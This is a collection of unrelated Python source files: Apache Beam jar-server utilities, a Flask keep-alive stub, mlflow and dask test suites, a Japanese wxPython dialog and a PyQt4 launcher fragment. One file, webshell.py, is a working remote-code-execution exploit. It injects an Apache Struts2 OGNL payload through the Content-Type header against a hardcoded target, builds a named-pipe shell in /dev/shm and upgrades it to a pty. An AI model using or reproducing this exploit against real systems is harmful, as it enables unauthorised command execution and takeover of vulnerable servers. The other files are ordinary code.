'transform/runner.')
return super(JavaJarServer, self).start_process()
def stop_process(self):
if self._existing_service:
pass
else:
return super(JavaJarServer, self).stop_process()
@classmethod
def jar_name(cls, artifact_id, version, classifier=None, appendix=None):
return '-'.join(
filter(None, [artifact_id, appendix, version, classifier])) + '.jar'
@classmethod
def path_to_maven_jar(
cls,
artifact_id,
group_id,
version,
repository=APACHE_REPOSITORY,
classifier=None,
appendix=None):
return '/'.join([
repository,
group_id.replace('.', '/'),
artifact_id,
version,
cls.jar_name(artifact_id, version, classifier, appendix)
])
@classmethod
def path_to_beam_jar(
cls,
gradle_target,
appendix=None,
version=beam_version,
artifact_id=None):
if gradle_target in cls._BEAM_SERVICES.replacements:
return cls._BEAM_SERVICES.replacements[gradle_target]
gradle_package = gradle_target.strip(':').rsplit(':', 1)[0]
if not artifact_id:
artifact_id = 'beam-' + gradle_package.replace(':', '-')
project_root = os.path.sep.join(
os.path.abspath(__file__).split(os.path.sep)[:-5])
local_path = os.path.join(
project_root,
gradle_package.replace(':', os.path.sep),
'build',
'libs',
cls.jar_name(
artifact_id,
version.replace('.dev', ''),
classifier='SNAPSHOT',
appendix=appendix))
if os.path.exists(local_path):
_LOGGER.info('Using pre-built snapshot at %s', local_path)
return local_path
elif '.dev' in version:
# TODO: Attempt to use nightly snapshots?
raise RuntimeError(
(
'%s not found. '
'Please build the server with \n cd %s; ./gradlew %s') %
(local_path, os.path.abspath(project_root), gradle_target))
else:
return cls.path_to_maven_jar(
artifact_id,
cls.BEAM_GROUP_ID,
version,
cls.APACHE_REPOSITORY,
appendix=appendix)
@classmethod
def local_jar(cls, url, cache_dir=None):
if cache_dir is None:
cache_dir = cls.JAR_CACHE
# TODO: Verify checksum?
if _is_service_endpoint(url):
return url
elif os.path.exists(url):
return url
else:
cached_jar = os.path.join(cache_dir, os.path.basename(url))
if os.path.exists(cached_jar):
_LOGGER.info('Using cached job server jar from %s' % url)
else:
_LOGGER.info('Downloading job server jar from %s' % url)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# TODO: Clean up this cache according to some policy.
try:
url_read = urlopen(url)
with open(cached_jar + '.tmp', 'wb') as jar_write:
shutil.copyfileobj(url_read, jar_write, length=1 << 20)
os.rename(cached_jar + '.tmp', cached_jar)
except URLError as e:
raise RuntimeError(
'Unable to fetch remote job server jar at %s: %s' % (url, e))
return cached_jar
@classmethod
@contextlib.contextmanager
def beam_services(cls, replacements):
try:
old = cls._BEAM_SERVICES.replacements
cls._BEAM_SERVICES.replacements = dict(old, **replacements)
yield
finally:
cls._BEAM_SERVICES.replacements = old
def _is_service_endpoint(path):
return re.match(r'^[a-zA-Z0-9.-]+:\d+$', path)
def pick_port(*ports):
"""
Returns a list of ports, same length as input ports list, but replaces
all None or 0 ports with a random free port.
"""
sockets = []
def find_free_port(port):
if port:
return port
else:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except OSError as e:
# [Errno 97] Address family not supported by protocol
# Likely indicates we are in an IPv6-only environment (BEAM-10618). Try
# again with AF_INET6.
if e.errno == 97:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
raise e
sockets.append(s)
s.bind(('localhost', 0))
return s.getsockname()[1]
ports = list(map(find_free_port, ports))
# Close sockets only now to avoid the same port to be chosen twice
for s in sockets:
s.close()
return ports
|
keep_alive.py
|
from flask import Flask
from threading import Thread
class localFlask(Flask):
def process_response(self, res):
#Every response will be processed here first
res.headers = {}
return res
app = localFlask('')
@app.route('/')
def home():
return ''
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
Thread(target=run).start()
|
test_process_utils.py
|
import pytest
import uuid
from mlflow.utils.process import cache_return_value_per_process
from multiprocessing import Process, Queue
@cache_return_value_per_process
def _gen_random_str1(v):
return str(v) + uuid.uuid4().hex
@cache_return_value_per_process
def _gen_random_str2(v):
return str(v) + uuid.uuid4().hex
@cache_return_value_per_process
def _gen_random_no_arg():
return uuid.uuid4().hex
def _test_cache_return_value_per_process_child_proc_target(path1, path3, queue):
# in forked out child process
child_path1 = _gen_random_str1(True)
child_path2 = _gen_random_str1(False)
result = len({path1, path3, child_path1, child_path2}) == 4
queue.put(result)
def test_cache_return_value_per_process():
path1 = _gen_random_str1(True)
path2 = _gen_random_str1(True)
assert path1 == path2
path3 = _gen_random_str1(False)
assert path3 != path2
no_arg_path1 = _gen_random_no_arg()
no_arg_path2 = _gen_random_no_arg()
assert no_arg_path1 == no_arg_path2
with pytest.raises(
ValueError,
match="The function decorated by `cache_return_value_per_process` is not allowed to be"
"called with key-word style arguments.",
):
_gen_random_str1(v=True)
f2_path1 = _gen_random_str2(True)
f2_path2 = _gen_random_str2(False)
assert len({path1, path3, f2_path1, f2_path2}) == 4
queue = Queue()
child_proc = Process(
target=_test_cache_return_value_per_process_child_proc_target, args=(path1, path3, queue)
)
child_proc.start()
child_proc.join()
assert queue.get(), "Testing inside child process failed."
|
webshell.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import base64
import random
import requests
import threading
import time
class WebShell(object):
# Initialize Class + Setup Shell
def __init__(self, interval=1.3, proxies='http://127.0.0.1:8080'):
self.url = r"http://10.10.10.64/Monitoring/example/Welcome.action"
self.proxies = {'http': proxies}
session = random.randrange(10000,99999)
print(f"[*] Session ID: {session}")
self.stdin = f'/dev/shm/input.{session}'
self.stdout = f'/dev/shm/output.{session}'
self.interval = interval
# set up shell
print("[*] Setting up fifo shell on target")
MakeNamedPipes = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.RunRawCmd(MakeNamedPipes, timeout=0.1)
# set up read thread
print("[*] Setting up read thread")
self.interval = interval
thread = threading.Thread(target=self.ReadThread, args=())
thread.daemon = True
thread.start()
# Read $session output text to screen & wipe session
def ReadThread(self):
GetOutput = f"/bin/cat {self.stdout}"
while True:
result = self.RunRawCmd(GetOutput) #, proxy=None)
if result:
print(result)
ClearOutput = f'echo -n "" > {self.stdout}'
self.RunRawCmd(ClearOutput)
time.sleep(self.interval)
# Execute Command
def RunRawCmd(self, cmd, timeout=50, proxy="http://127.0.0.1:8080"):
#print(f"Going to run cmd: {cmd}")
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
if proxy:
proxies = self.proxies
else:
proxies = {}
headers = {'User-Agent': 'YouAllRock', 'Content-Type': payload}
try:
r = requests.get(self.url, headers=headers, proxies=proxies, timeout=timeout)
return r.text
except:
pass
# Send b64'd command to RunRawCommand
def WriteCmd(self, cmd):
b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8')
stage_cmd = f'echo {b64cmd} | base64 -d > {self.stdin}'
self.RunRawCmd(stage_cmd)
time.sleep(self.interval * 1.1)
def UpgradeShell(self):
# upgrade shell
UpgradeShell = """python3 -c 'import pty; pty.spawn("/bin/bash")'"""
self.WriteCmd(UpgradeShell)
prompt = "Prompt> "
S = WebShell()
while True:
cmd = input(prompt)
if cmd == "upgrade":
prompt = ""
S.UpgradeShell()
else:
S.WriteCmd(cmd)
|
editscenariodb.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import time
import wx
import cw
#-------------------------------------------------------------------------------
# シナリオDB構築ダイアログ
#-------------------------------------------------------------------------------
class ConstructScenarioDB(wx.Dialog):
def __init__(self, parent, dpaths):
"""シナリオ検索の始点から見つかる全てのシナリオを
シナリオDBに登録する。
"""
wx.Dialog.__init__(self, parent, -1, u"シナリオデータベースの構築",
style=wx.CAPTION|wx.SYSTEM_MENU|wx.CLOSE_BOX)
self.cwpy_debug = True
self.dpaths = dpaths
self._message = u"フォルダの一覧を作成しています..."
self._curnum = 0
self._complete = False
self._cancel = False
self._clear = False
self.text = wx.StaticText(self, -1, u"シナリオフォルダを起点として発見できる全てのシナリオを\nシナリオデータベースに登録します。\nデータベースに登録されたシナリオはシナリオ選択ダイアログで\n高速に表示できる他、検索で発見できるようになります。\nシナリオデータベースの構築を開始しますか?")
self.clear = wx.CheckBox(self, -1, u"構築前にデータベースを初期化する")
# btn
self.okbtn = wx.Button(self, -1, u"構築開始...")
self.cnclbtn = wx.Button(self, wx.ID_CANCEL, u"キャンセル")
self._do_layout()
self._bind()
def _bind(self):
self.Bind(wx.EVT_BUTTON, self.OnClickOkBtn, self.okbtn)
def _do_layout(self):
sizer_top = wx.BoxSizer(wx.VERTICAL)
sizer_top.Add(self.text, 0, wx.BOTTOM, cw.ppis(10))
sizer_top.Add(self.clear, 0, wx.ALIGN_RIGHT, cw.ppis(0))
sizer_btn = wx.BoxSizer(wx.HORIZONTAL)
sizer_btn.Add(self.okbtn, 1, 0, cw.ppis(0))
sizer_btn.Add(cw.ppis((10, 0)), 0, 0, cw.ppis(0))
sizer_btn.Add(self.cnclbtn, 1, 0, cw.ppis(0))
sizer_v1 = wx.BoxSizer(wx.VERTICAL)
sizer_v1.Add(sizer_top, 0, 0, cw.ppis(0))
sizer_v1.Add(sizer_btn, 0, wx.ALIGN_RIGHT|wx.TOP, cw.ppis(10))
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(sizer_v1, 0, wx.ALL, cw.ppis(10))
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
def construct_scenariodb(self):
self._message = u"フォルダの一覧を作成しています..."
self._curnum = 0
while not cw.scenariodb.ScenariodbUpdatingThread.is_finished():
pass
d = {}
count = 0
for i, (skintype, dpaths) in enumerate(self.dpaths.iteritems()):
if self._cancel:
break
self._message = u"フォルダの一覧を作成しています... (%s/%s)" % (i+1, len(self.dpaths))
if skintype in d:
s = d[skintype]
else:
s = set()
d[skintype] = s
for dpath in dpaths:
if self._cancel:
break
s2 = cw.scenariodb.find_alldirectories(dpath, lambda: self._cancel)
count += len(s2)
s.update(s2)
self._curnum += 1
db = cw.cwpy.frame.open_scenariodb()
if self._clear and not self._cancel:
db.delete_all(commit=False)
completed = 0
for skintype, dpaths in d.iteritems():
if self._cancel:
break
for dpath in dpaths:
if self._cancel:
break
self._message = u"シナリオを登録しています... (%s/%s)" % (completed+1, count)
db.update(dpath=dpath, skintype=skintype, commit=False)
completed += 1
self._curnum = len(self.dpaths) + int((float(completed)/count)*100)
if not self._cancel:
db.commit()
self._message = u"データベース内の空領域を再編成しています..."
db.vacuum()
self._curnum = 100+len(self.dpaths)+1
self._complete = True
def OnClickOkBtn(self, event):
# プログレスダイアログ表示
dlg = cw.dialog.progress.SysProgressDialog(self,
u"シナリオデータベースの構築", u"",
maximum=100+len(self.dpaths)+1,
cancelable=True)
cw.cwpy.frame.move_dlg(dlg)
self._message = u"フォルダの一覧を作成しています..."
self._curnum = 0
self._complete = False
self._cancel = False
self._clear = self.clear.IsChecked()
thread = threading.Thread(target=self.construct_scenariodb)
thread.start()
def progress():
while not self._complete and not dlg.cancel:
self._cancel = dlg.cancel
wx.CallAfter(dlg.Update, self._curnum, self._message)
time.sleep(0.001)
self._cancel = dlg.cancel
wx.CallAfter(dlg.Destroy)
thread2 = threading.Thread(target=progress)
thread2.start()
dlg.ShowModal()
thread.join()
thread2.join()
if not self._cancel:
s = u"データベースの構築が完了しました。"
wx.MessageBox(s, u"メッセージ", wx.OK|wx.ICON_INFORMATION, self)
self.Destroy()
|
test_nanny.py
|
import asyncio
import gc
import logging
import multiprocessing as mp
import os
import random
import sys
from contextlib import suppress
from time import sleep
from unittest import mock
import psutil
import pytest
pytestmark = pytest.mark.gpu
from tlz import first, valmap
from tornado.ioloop import IOLoop
import dask
from dask.utils import tmpfile
from distributed import Nanny, Scheduler, Worker, rpc, wait, worker
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import CommClosedError, Status
from distributed.diagnostics import SchedulerPlugin
from distributed.metrics import time
from distributed.protocol.pickle import dumps
from distributed.utils import TimeoutError, parse_ports
from distributed.utils_test import captured_logger, gen_cluster, gen_test, inc
pytestmark = pytest.mark.ci1
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=120)
async def test_nanny(s):
async with Nanny(s.address, nthreads=2, loop=s.loop) as n:
async with rpc(n.address) as nn:
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.kill()
assert not n.is_alive()
start = time()
while n.worker_address in s.workers:
assert time() < start + 1
await asyncio.sleep(0.01)
await nn.kill()
assert not n.is_alive()
assert n.worker_address not in s.workers
await nn.instantiate()
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.terminate()
assert not n.is_alive()
@gen_cluster(nthreads=[])
async def test_many_kills(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
assert n.is_alive()
await asyncio.gather(*(n.kill() for _ in range(5)))
await asyncio.gather(*(n.kill() for _ in range(5)))
await n.close()
@gen_cluster(Worker=Nanny)
async def test_str(s, a, b):
assert a.worker_address in str(a)
assert a.worker_address in repr(a)
assert str(a.nthreads) in str(a)
assert str(a.nthreads) in repr(a)
@gen_cluster(nthreads=[], client=True)
async def test_nanny_process_failure(c, s):
n = await Nanny(s.address, nthreads=2)
first_dir = n.worker_dir
assert os.path.exists(first_dir)
ww = rpc(n.worker_address)
await ww.update_data(data=valmap(dumps, {"x": 1, "y": 2}))
pid = n.pid
assert pid is not None
with suppress(CommClosedError):
await c.run(os._exit, 0, workers=[n.worker_address])
while n.pid == pid: # wait while process dies and comes back
await asyncio.sleep(0.01)
await asyncio.sleep(1)
while not n.is_alive(): # wait while process comes back
await asyncio.sleep(0.01)
# assert n.worker_address != original_address # most likely
while n.worker_address not in s.nthreads or n.worker_dir is None:
await asyncio.sleep(0.01)
second_dir = n.worker_dir
await n.close()
assert not os.path.exists(second_dir)
assert not os.path.exists(first_dir)
assert first_dir != n.worker_dir
await ww.close_rpc()
s.stop()
@gen_cluster(nthreads=[])
async def test_run(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
with rpc(n.address) as nn:
response = await nn.run(function=dumps(lambda: 1))
assert response["status"] == "OK"
assert response["result"] == 1
await n.close()
@pytest.mark.slow
@gen_cluster(config={"distributed.comm.timeouts.connect": "1s"}, timeout=120)
async def test_no_hang_when_scheduler_closes(s, a, b):
# https://github.com/dask/distributed/issues/2880
with captured_logger("tornado.application", logging.ERROR) as logger:
await s.close()
await asyncio.sleep(1.2)
assert a.status == Status.closed
assert b.status == Status.closed
out = logger.getvalue()
assert "Timed out trying to connect" not in out
@pytest.mark.slow
@gen_cluster(
Worker=Nanny, nthreads=[("127.0.0.1", 1)], worker_kwargs={"reconnect": False}
)
async def test_close_on_disconnect(s, w):
await s.close()
start = time()
while w.status != Status.closed:
await asyncio.sleep(0.05)
assert time() < start + 9
class Something(Worker):
# a subclass of Worker which is not Worker
pass
@gen_cluster(client=True, Worker=Nanny)
async def test_nanny_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Worker" in list(out.values())[0]
assert w1.Worker is Worker
@gen_cluster(client=True, Worker=Nanny, worker_kwargs={"worker_class": Something})
async def test_nanny_alt_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Something" in list(out.values())[0]
assert w1.Worker is Something
@pytest.mark.slow
@gen_cluster(nthreads=[])
async def test_nanny_death_timeout(s):
await s.close()
w = Nanny(s.address, death_timeout=1)
with pytest.raises(TimeoutError):
await w
assert w.status == Status.closed
@gen_cluster(client=True, Worker=Nanny)
async def test_random_seed(c, s, a, b):
async def check_func(func):
x = c.submit(func, 0, 2**31, pure=False, workers=a.worker_address)
y = c.submit(func, 0, 2**31, pure=False, workers=b.worker_address)
assert x.key != y.key
x = await x
y = await y
assert x != y
await check_func(lambda a, b: random.randint(a, b))
np = pytest.importorskip("numpy")
await check_func(lambda a, b: np.random.randint(a, b))
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@gen_cluster(nthreads=[])
async def test_num_fds(s):
proc = psutil.Process()
# Warm up
w = await Nanny(s.address)
await w.close()
del w
gc.collect()
before = proc.num_fds()
for i in range(3):
w = await Nanny(s.address)
await asyncio.sleep(0.1)
await w.close()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
await asyncio.sleep(0.1)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(client=True, nthreads=[])
async def test_worker_uses_same_host_as_nanny(c, s):
for host in ["tcp://0.0.0.0", "tcp://127.0.0.2"]:
n = await Nanny(s.address, host=host)
def func(dask_worker):
return dask_worker.listener.listen_address
result = await c.run(func)
assert host in first(result.values())
await n.close()
@gen_test()
async def test_scheduler_file():
with tmpfile() as fn:
s = await Scheduler(scheduler_file=fn, dashboard_address=":0")
w = await Nanny(scheduler_file=fn)
assert set(s.workers) == {w.worker_address}
await w.close()
s.stop()
@gen_cluster(client=True, Worker=Nanny, nthreads=[("127.0.0.1", 2)])
async def test_nanny_timeout(c, s, a):
x = await c.scatter(123)
with captured_logger(
logging.getLogger("distributed.nanny"), level=logging.ERROR
) as logger:
response = await a.restart(timeout=0.1)
out = logger.getvalue()
assert "timed out" in out.lower()
start = time()
while x.status != "cancelled":
await asyncio.sleep(0.1)
assert time() < start + 7
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": "400 MiB"},
)
async def test_nanny_terminate(c, s, a):
def leak():
L = []
while True:
L.append(b"0" * 5_000_000)
sleep(0.01)
before = a.process.pid
with captured_logger(logging.getLogger("distributed.nanny")) as logger:
future = c.submit(leak)
while a.process.pid == before:
await asyncio.sleep(0.01)
out = logger.getvalue()
assert "restart" in out.lower()
assert "memory" in out.lower()
@gen_cluster(
nthreads=[("127.0.0.1", 1)] * 8,
client=True,
Worker=Worker,
clean_kwargs={"threads": False},
)
async def test_throttle_outgoing_connections(c, s, a, *workers):
# But a bunch of small data on worker a
await c.run(lambda: logging.getLogger("distributed.worker").setLevel(logging.DEBUG))
remote_data = c.map(
lambda x: b"0" * 10000, range(10), pure=False, workers=[a.address]
)
await wait(remote_data)
def pause(dask_worker):
# Patch paused and memory_monitor on the one worker
# This is is very fragile, since a refactor of memory_monitor to
# remove _memory_monitoring will break this test.
dask_worker._memory_monitoring = True
dask_worker.status = Status.paused
dask_worker.outgoing_current_count = 2
await c.run(pause, workers=[a.address])
requests = [
await a.get_data(await w.rpc.connect(w.address), keys=[f.key], who=w.address)
for w in workers
for f in remote_data
]
await wait(requests)
wlogs = await c.get_worker_logs(workers=[a.address])
wlogs = "\n".join(x[1] for x in wlogs[a.address])
assert "throttling" in wlogs.lower()
@gen_cluster(nthreads=[], client=True)
async def test_avoid_memory_monitor_if_zero_limit(c, s):
nanny = await Nanny(s.address, loop=s.loop, memory_limit=0)
typ = await c.run(lambda dask_worker: type(dask_worker.data))
assert typ == {nanny.worker_address: dict}
pcs = await c.run(lambda dask_worker: list(dask_worker.periodic_callbacks))
assert "memory" not in pcs
assert "memory" not in nanny.periodic_callbacks
future = c.submit(inc, 1)
assert await future == 2
await asyncio.sleep(0.02)
await c.submit(inc, 2) # worker doesn't pause
await nanny.close()
@gen_cluster(nthreads=[], client=True)
async def test_scheduler_address_config(c, s):
with dask.config.set({"scheduler-address": s.address}):
nanny = await Nanny(loop=s.loop)
assert nanny.scheduler.address == s.address
start = time()
while not s.workers:
await asyncio.sleep(0.1)
assert time() < start + 10
await nanny.close()
@pytest.mark.slow
@gen_test()
async def test_wait_for_scheduler():
with captured_logger("distributed") as log:
w = Nanny("127.0.0.1:44737")
IOLoop.current().add_callback(w.start)
await asyncio.sleep(6)
await w.close()
log = log.getvalue()
assert "error" not in log.lower(), log
assert "restart" not in log.lower(), log
@gen_cluster(nthreads=[], client=True)
async def test_environment_variable(c, s):
a = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "123"})
b = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "456"})
await asyncio.gather(a, b)
results = await c.run(lambda: os.environ["FOO"])
assert results == {a.worker_address: "123", b.worker_address: "456"}
await asyncio.gather(a.close(), b.close())
@gen_cluster(nthreads=[], client=True)
async def test_environment_variable_by_config(c, s, monkeypatch):
with dask.config.set({"distributed.nanny.environ": "456"}):
with pytest.raises(TypeError, match="configuration must be of type dict"):
Nanny(s.address, loop=s.loop, memory_limit=0)
with dask.config.set({"distributed.nanny.environ": {"FOO": "456"}}):
# precedence
# kwargs > env var > config
with mock.patch.dict(os.environ, {"FOO": "BAR"}, clear=True):
a = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "123"})
x = Nanny(s.address, loop=s.loop, memory_limit=0)
b = Nanny(s.address, loop=s.loop, memory_limit=0)
await asyncio.gather(a, b, x)
results = await c.run(lambda: os.environ["FOO"])
assert results == {
a.worker_address: "123",
b.worker_address: "456",
x.worker_address: "BAR",
}
await asyncio.gather(a.close(), b.close(), x.close())
@gen_cluster(
nthreads=[],
client=True,
config={"distributed.nanny.environ": {"A": 1, "B": 2, "D": 4}},
)
async def test_environment_variable_config(c, s, monkeypatch):
monkeypatch.setenv("D", "123")
async with Nanny(s.address, env={"B": 3, "C": 4}) as n:
results = await c.run(lambda: os.environ)
assert results[n.worker_address]["A"] == "1"
assert results[n.worker_address]["B"] == "3"
assert results[n.worker_address]["C"] == "4"
assert results[n.worker_address]["D"] == "123"
@gen_cluster(nthreads=[], client=True)
async def test_data_types(c, s):
w = await Nanny(s.address, data=dict)
r = await c.run(lambda dask_worker: type(dask_worker.data))
assert r[w.worker_address] == dict
await w.close()
@gen_cluster(nthreads=[])
async def test_local_directory(s):
with tmpfile() as fn:
with dask.config.set(temporary_directory=fn):
w = await Nanny(s.address)
assert w.local_directory.startswith(fn)
assert "dask-worker-space" in w.local_directory
assert w.process.worker_dir.count("dask-worker-space") == 1
await w.close()
def _noop(x):
"""Define here because closures aren't pickleable."""
pass
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_process_worker_no_daemon(c, s, a):
def multiprocessing_worker():
p = mp.Process(target=_noop, args=(None,))
p.start()
p.join()
await c.submit(multiprocessing_worker)
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_pool_worker_no_daemon(c, s, a):
def pool_worker(world_size):
with mp.Pool(processes=world_size) as p:
p.map(_noop, range(world_size))
await c.submit(pool_worker, 4)
@gen_cluster(nthreads=[])
async def test_nanny_closes_cleanly(s):
async with Nanny(s.address) as n:
assert n.process.pid
proc = n.process.process
assert not n.process
assert not proc.is_alive()
assert proc.exitcode == 0
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=60)
async def test_lifetime(s):
counter = 0
event = asyncio.Event()
class Plugin(SchedulerPlugin):
def add_worker(self, **kwargs):
pass
def remove_worker(self, **kwargs):
nonlocal counter
counter += 1
if counter == 2: # wait twice, then trigger closing event
event.set()
s.add_plugin(Plugin())
async with Nanny(s.address):
async with Nanny(s.address, lifetime="500 ms", lifetime_restart=True):
await event.wait()
@gen_cluster(client=True, nthreads=[])
async def test_nanny_closes_cleanly_2(c, s):
async with Nanny(s.address) as n:
with c.rpc(n.worker_address) as w:
IOLoop.current().add_callback(w.terminate)
start = time()
while n.status != Status.closed:
await asyncio.sleep(0.01)
assert time() < start + 5
assert n.status == Status.closed
@gen_cluster(client=True, nthreads=[])
async def test_config(c, s):
async with Nanny(s.address, config={"foo": "bar"}) as n:
config = await c.run(dask.config.get, "foo")
assert config[n.worker_address] == "bar"
@gen_cluster(client=True, nthreads=[])
async def test_nanny_port_range(c, s):
nanny_port = "9867:9868"
worker_port = "9869:9870"
async with Nanny(s.address, port=nanny_port, worker_port=worker_port) as n1:
assert n1.port == 9867 # Selects first port in range
async with Nanny(s.address, port=nanny_port, worker_port=worker_port) as n2:
assert n2.port == 9868 # Selects next port in range
with pytest.raises(
ValueError, match="Could not start Nanny"
): # No more ports left
async with Nanny(s.address, port=nanny_port, worker_port=worker_port):
pass
# Ensure Worker ports are in worker_port range
def get_worker_port(dask_worker):
return dask_worker.port
worker_ports = await c.run(get_worker_port)
assert list(worker_ports.values()) == parse_ports(worker_port)
class KeyboardInterruptWorker(worker.Worker):
"""A Worker that raises KeyboardInterrupt almost immediately"""
async def heartbeat(self):
def raise_err():
raise KeyboardInterrupt()
self.loop.add_callback(raise_err)
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
@pytest.mark.asyncio
async def test_nanny_closed_by_keyboard_interrupt(cleanup, protocol):
if protocol == "ucx": # Skip if UCX isn't available
pytest.importorskip("ucp")
async with Scheduler(protocol=protocol, dashboard_address=":0") as s:
async with Nanny(
s.address, nthreads=1, worker_class=KeyboardInterruptWorker
) as n:
n.auto_restart = False
await n.process.stopped.wait()
# Check that the scheduler has been notified about the closed worker
assert len(s.workers) == 0
class StartException(Exception):
pass
class BrokenWorker(worker.Worker):
async def start(self):
raise StartException("broken")
@gen_cluster(nthreads=[])
async def test_worker_start_exception(s):
# make sure this raises the right Exception:
with pytest.raises(StartException):
async with Nanny(s.address, worker_class=BrokenWorker) as n:
pass
@gen_cluster(nthreads=[])
async def test_failure_during_worker_initialization(s):
with captured_logger(logger="distributed.nanny", level=logging.WARNING) as logs:
with pytest.raises(Exception):
async with Nanny(s.address, foo="bar") as n:
await n
assert "Restarting worker" not in logs.getvalue()
@gen_cluster(client=True, Worker=Nanny)
async def test_environ_plugin(c, s, a, b):
from dask.distributed import Environ
await c.register_worker_plugin(Environ({"ABC": 123}))
async with Nanny(s.address, name="new") as n:
results = await c.run(os.getenv, "ABC")
assert results[a.worker_address] == "123"
assert results[b.worker_address] == "123"
assert results[n.worker_address] == "123"
@pytest.mark.parametrize(
"modname",
[
# numpy is always imported, and for a good reason:
# https://github.com/dask/distributed/issues/5729
"scipy",
pytest.param("pandas", marks=pytest.mark.xfail(reason="distributed#5723")),
],
)
@gen_cluster(client=True, Worker=Nanny, nthreads=[("", 1)])
async def test_no_unnecessary_imports_on_worker(c, s, a, modname):
"""
Regression test against accidentally importing unnecessary modules at worker startup.
Importing modules like pandas slows down worker startup, especially if workers are
loading their software environment from NFS or other non-local filesystems.
It also slightly increases memory footprint.
"""
def assert_no_import(dask_worker):
assert modname not in sys.modules
await c.wait_for_workers(1)
await c.run(assert_no_import)
|
sstvLauncher.py
|
import sys, signal, os, urllib, subprocess, json, logging, ntpath, platform, requests, shutil, threading, multiprocessing
from PyQt4 import QtGui, QtCore
from logging.handlers import RotatingFileHandler
# Setup logging
log_formatter = logging.Formatter(
'%(asctime)s - %(levelname)-10s - %(name)-10s - %(funcName)-25s- %(message)s')
logger = logging.getLogger('SmoothStreamsLauncher ')
logger.setLevel(logging.DEBUG)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
# Console logging
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
# Rotating Log Files
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache')):
os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache'))
file_handler = RotatingFileHandler(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'),
maxBytes=1024 * 1024 * 2,
backupCount=5)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
logger.addHandler(file_handler)
class SystemTrayIcon(QtGui.QSystemTrayIcon):
def __init__(self, icon, parent=None):
self.initVariables()
QtGui.QSystemTrayIcon.__init__(self,icon,parent)
self.menu = QtGui.QMenu(parent)
self.createMenu()
self.setContextMenu(self.menu)
self.set_icon()
if self.start:
logger.info("Launching YAP!")
self.tray_start()
else:
logger.info("not launching")
def createMenu(self,update=False):
if update: self.menu.clear()
if self.start:
openAction = self.menu.addAction('Open YAP')
QtCore.QObject.connect(openAction, QtCore.SIGNAL('triggered()'), self.tray_open)
terminalAction = self.menu.addAction('Show Terminal')
QtCore.QObject.connect(terminalAction, QtCore.SIGNAL('triggered()'), self.showTerminal)
else:
startAction = self.menu.addAction('Start YAP')
QtCore.QObject.connect(startAction, QtCore.SIGNAL('triggered()'), self.tray_restart)
self.menu.addSeparator()
checkAction = self.menu.addAction('Check for Updates')
QtCore.QObject.connect(checkAction, QtCore.SIGNAL('triggered()'), self.tray_check_update)
updateAction = self.menu.addAction('Update')
QtCore.QObject.connect(updateAction, QtCore.SIGNAL('triggered()'), self.tray_update)
if self.start:
restartAction = self.menu.addAction('Restart YAP')
QtCore.QObject.connect(restartAction, QtCore.SIGNAL('triggered()'), self.tray_restart)
branchAction = self.menu.addAction('Switch Master/Dev')
QtCore.QObject.connect(branchAction, QtCore.SIGNAL('triggered()'), self.tray_branch)
